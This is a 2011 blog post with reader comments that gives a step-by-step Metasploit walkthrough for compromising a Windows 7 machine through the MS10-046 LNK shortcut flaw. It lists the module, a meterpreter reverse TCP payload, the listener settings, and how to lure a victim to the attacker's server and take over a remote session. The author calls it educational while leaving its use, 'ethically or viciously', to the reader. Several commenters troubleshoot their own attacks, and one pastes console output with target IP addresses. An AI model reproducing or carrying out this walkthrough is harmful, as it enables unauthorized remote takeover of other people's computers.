jump to navigation

METASPLOIT: Hacking windows 7 exploit December 17, 2011

Posted by hasnain110 in Uncategorized.
trackback

 

 

 

Hey Guys. I will be giving a quick dirty how-to of exploiting a windows velunurbility to login to remove system with out username and password using Metasploit

Requirements:

1. MetaSploit Installed (Preferably BackTrac)

2. Ruby Installed (Install all the package of Ruby to avoid any issues)

3. Two OS running either on same as virtual or physically different

4. Target host must not be running any AV

Here are the quick Steps.

SCENARIO:

Machine 1:  Host Linux  Machine

Machine 2: Target Windows 7 Machine

Step 1:

Download and Install Metasploit Framework Source Code on the Machine 1. I prefer downloading from SVN. run the given below command on CLI

svn co https://www.metasploit.com/svn/framework3/trunk/

OR

Download directly from here:http://downloads.metasploit.com/data/releases/framework-latest.tar.bz2

Step 2:

Locate the file msfconsole. In my case it was under /opt/framework-x.x.x/app

Run it as ruby msfconsole

image

Step 3:

Now once you get the msf> prompt type the below command

search LNK

and look for the module exploit/windows/browser/ms10_046_shortcut_icon_dllloader

image

Step 4:

Now once we have found the desired module we will use this exploit by typing the below command

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

Once loaded your msf prompt should be inclusive of the loaded exploit. given below is the image

image

Step 5:

Now once the exploit is loaded we will set the payload for the above select exploit. In our scenario will be using reverse TCP payload. Type the below command to set payload

set payload windows/meterpreter/reverse_tcp

image

Step 6:

Now its time to do some configuration for the exploit/payload that we have just set. type the given command

show options

You should get below default output.

image

 

Step 7:

Now we have to set the local host to listen. Type the given below two commands

set SRVHOST x.x.x.x ( This will be your HOST IP address running metasploit )

Then run

set LHOST x.x.x.x ( This will be also be your HOST IP address running metasploit)

image

Step 8:

Now check if the above applied configuration is applied

image

 

Step 9:

Now Finally we will start to exploit. Run the command Exploit

Once executed we should “Server Started” (Make sure that your server is not running any web service on port 80)

image

Seems like all is ok till now Smile

 

Step 10:

On any Client machine simply open Internet Explorer and try to open http://x.x.x.x (IP of the MetaSploit server)

Note: it will give your a pop-up asking from permission click ALLOW.

**Make sure you do not have any AntiVirus running on the target PC

Step 11:

Once connection is established you should see something like below

image

Step 12:

You can check the number of successful connected session by running the command sessons in msf console

image

Step 13

Now as we can see that we have one victim connected its time to login to the system. run the command session –i 1

Once connected type linux command to browse inside the System..Enjoy Smile

image

 

Final Step:

This Documentation is purely for educational purpose. using it ethically or viciously its your individual act Smile .

Use it responsibly.  Comment if you like the post

Ending Note: Can not explain the details of each step due to lack of time:

About these ads

Comments»

1. stevenwinslow - May 12, 2012

Spot on tutorial , thanks , it will give me something else to play with.

2. stevenwinslow - May 12, 2012

Reblogged this on 4stripe.

3. Tiago Sá Marques - June 14, 2012

Very nice tutorial!!
I tried this using my laptop and my desktop with windows 7 as Target.
Everything went smoothly, just when I entered on http://x.x.x.x(int the targeted computer), on the msfconsole(in the laptop) appeared “Sending UNC redirect to x.x.x.x” but nothing more happened.
Did I do something wrong?
Thanks

Tiago

stevenwinslow - June 14, 2012

Tiago ( p.s awesome name ! ), it might be a silly question but have you changed the x.x.x.x for the ip of the target computer?

4. Tiago Sá Marques - June 14, 2012

PS- I disabled the Anti-virus and firewall on the Desktop.

Tiago

5. masterpatfx - August 25, 2012

this is giving me: the adress is already in use (192.168.46.128:80)

(when i click exploit)

HELP??

6. hasnain110 - August 25, 2012

Make sure you do not have something already running on your port 80, just in case check to make sure apache is not running

7. Carlton Banks - October 16, 2012

I am receiving the following error. Any suggestions? The client I am trying to attack is running Win 7. It’s IP is 172.106.92.149. The Linux box I am running (BT5R2) uses the following IP 172.106.193.227

It looks like this issue has something to do with my Linux box as it seems to trip when it begins to create a server.

[*] Exploit running as background job.

[-] Handler failed to bind to 172.106.92.149:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Send vulnerable clients to \\172.106.193.227\Ffsctflbq\.
[*] Or, get clients to save and render the icon of http:///.lnk
[*] Using URL: http://172.106.193.227:80/
[*] Server started.
[-] RbReadline Error: ThreadError deadlock; recursive locking ["/opt/metasploit/msf3/lib/rbreadline.rb:8686:in `write'", "/opt/metasploit/msf3/lib/rbreadline.rb:8686:in `_rl_redisplay_after_sigwinch'", "/opt/metasploit/msf3/lib/rbreadline.rb:8717:in `rl_resize_terminal'", "/opt/metasploit/msf3/lib/rbreadline.rb:8724:in `rl_sigwinch_handler'", "/opt/metasploit/msf3/lib/rbreadline.rb:1686:in `block in rl_set_signals'", "/opt/metasploit/msf3/lib/rbreadline.rb:8686:in `call'", "/opt/metasploit/msf3/lib/rbreadline.rb:8686:in `write'", "/opt/metasploit/msf3/lib/rbreadline.rb:8686:in `_rl_redisplay_after_sigwinch'", "/opt/metasploit/msf3/lib/rbreadline.rb:8717:in `rl_resize_terminal'", "/opt/metasploit/msf3/lib/rbreadline.rb:8724:in `rl_sigwinch_handler'", "/opt/metasploit/msf3/lib/rbreadline.rb:1686:in `block in rl_set_signals'", "/opt/metasploit/msf3/lib/rbreadline.rb:4470:in `call'", "/opt/metasploit/msf3/lib/rbreadline.rb:4470:in `read'", "/opt/metasploit/msf3/lib/rbreadline.rb:4470:in `rl_getc'", "/opt/metasploit/msf3/lib/rbreadline.rb:4519:in `rl_read_key'", "/opt/metasploit/msf3/lib/rbreadline.rb:4694:in `readline_internal_charloop'", "/opt/metasploit/msf3/lib/rbreadline.rb:4790:in `readline_internal'", "/opt/metasploit/msf3/lib/rbreadline.rb:4812:in `readline'", "/opt/metasploit/msf3/lib/readline_compatible.rb:77:in `readline'", "/opt/metasploit/msf3/lib/rex/ui/text/input/readline.rb:90:in `pgets'", "/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:184:in `run'", "/opt/metasploit/msf3/msfconsole:148:in `'"][*] Server stopped.
/opt/metasploit/msf3/lib/readline_compatible.rb:84:in `write': undefined method `call’ for nil:NilClass (NoMethodError)
from /opt/metasploit/msf3/lib/readline_compatible.rb:84:in `puts’
from /opt/metasploit/msf3/lib/readline_compatible.rb:84:in `rescue in readline’
from /opt/metasploit/msf3/lib/readline_compatible.rb:71:in `readline’
from /opt/metasploit/msf3/lib/rex/ui/text/input/readline.rb:90:in `pgets’
from /opt/metasploit/msf3/lib/rex/ui/text/shell.rb:184:in `run’
from /opt/metasploit/msf3/msfconsole:148:in `’

8. joe - January 11, 2013

on step 10 when i open it up on win 7 machine it redirects and on my metasploit i get spammed with “192.168.152.148 ms10_046_shortcut_ico_dllloader – Sending UNC redirect” and it just keeps spawning them and the firefox page one the win7 seven just keeps redirecting…. HELP

Karlos Borgia Crosier - September 17, 2013

same thing happening here… page just keeps redirecting..

9. mabbrouks - December 5, 2013

when i try to update the framework they ask my about userbam/password hlp Please?


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

Join 35 other followers

%d bloggers like this: